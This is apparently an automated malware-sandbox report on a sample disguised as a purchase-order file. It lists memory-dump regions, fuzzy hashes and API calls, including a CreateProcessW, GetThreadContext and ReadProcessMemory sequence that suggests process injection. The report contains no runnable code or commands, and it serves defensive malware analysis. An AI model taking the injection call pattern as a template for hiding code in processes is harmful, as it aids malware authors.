                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                    • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                    • Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                    • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                    APIs
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00415012
                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03971F15
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03971F39
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03971F5B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                    • Instruction ID: 16b40140626cf58e24ef669174db9ba1ef8e482cb17511b1d591035cf884bfdb
                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                    • Instruction Fuzzy Hash: 7812DD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7E5E77A4F81CB5A
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 0046FAF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _malloc_memmove
                                                    • String ID:
                                                    • API String ID: 1183979061-0
                                                    • Opcode ID: 87f94661207c863af8b1fc4af8a0b29539e0d831b94eba20ea055568682fb20f
                                                    • Instruction ID: 255320ec14e83fec4e4552c633d3a07f96161bd336a5b43614f928d9f0269463
                                                    • Opcode Fuzzy Hash: 87f94661207c863af8b1fc4af8a0b29539e0d831b94eba20ea055568682fb20f
                                                    • Instruction Fuzzy Hash: E551E6722043009BD310EF65DD82F5BB399AF89704F14492FF9859B382DB39E909C79A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 707c2cdfa7bef2c009cfee693d3db45aa35dec263164d90899270f5ccceaa858
                                                    • Instruction ID: 6b219bc4c0bbc29583a32018d9336d0aaf9d3e1b43f092b4040c7a5c6c0e764f
                                                    • Opcode Fuzzy Hash: 707c2cdfa7bef2c009cfee693d3db45aa35dec263164d90899270f5ccceaa858
                                                    • Instruction Fuzzy Hash: 18415EB4500612EBC710EF56C4C156AFBB0FF48308F2088AFE5D617355DBB9A950DB86
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 303862c4fd4a03bc1324ca2af6d966d3e1e58d5938709c8203916f4f5b621844
                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                    • Opcode Fuzzy Hash: 303862c4fd4a03bc1324ca2af6d966d3e1e58d5938709c8203916f4f5b621844
                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                    • Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
                                                    • Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                    • Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 6a38aabddccc6e4e9c083e301e8074d1606bbc09cb33c73b22fab7fe08a78cf2
                                                    • Instruction ID: f795c94f21b42bfaa1f1d864c387b497e6b2772b6b59ffbe067e85bcfecebbdf
                                                    • Opcode Fuzzy Hash: 6a38aabddccc6e4e9c083e301e8074d1606bbc09cb33c73b22fab7fe08a78cf2
                                                    • Instruction Fuzzy Hash: 65316170600608EBEF509F12DA816AE7BF4FF45751F20C82AEC99CA611E738D590CB99
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                    • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                                    • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                    • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 0044C1F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _malloc_memmove
                                                    • String ID:
                                                    • API String ID: 1183979061-0
                                                    • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                    • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                                    • Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                    • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __lock_file
                                                    • String ID:
                                                    • API String ID: 3031932315-0
                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 004142F5
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                    • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                    • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                    • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                    • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                    • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                    • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                    • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                                    • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                    • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 039726F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: 635838f057bbfe7d5c878f5eb2cc112aaa1f74124c02cf202649cd416ee0af85
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 19E0E67494010EDFDB00DFB8D6496DD7BB4EF04301F1005A1FD01D2280D6309D508A72
                                                    APIs
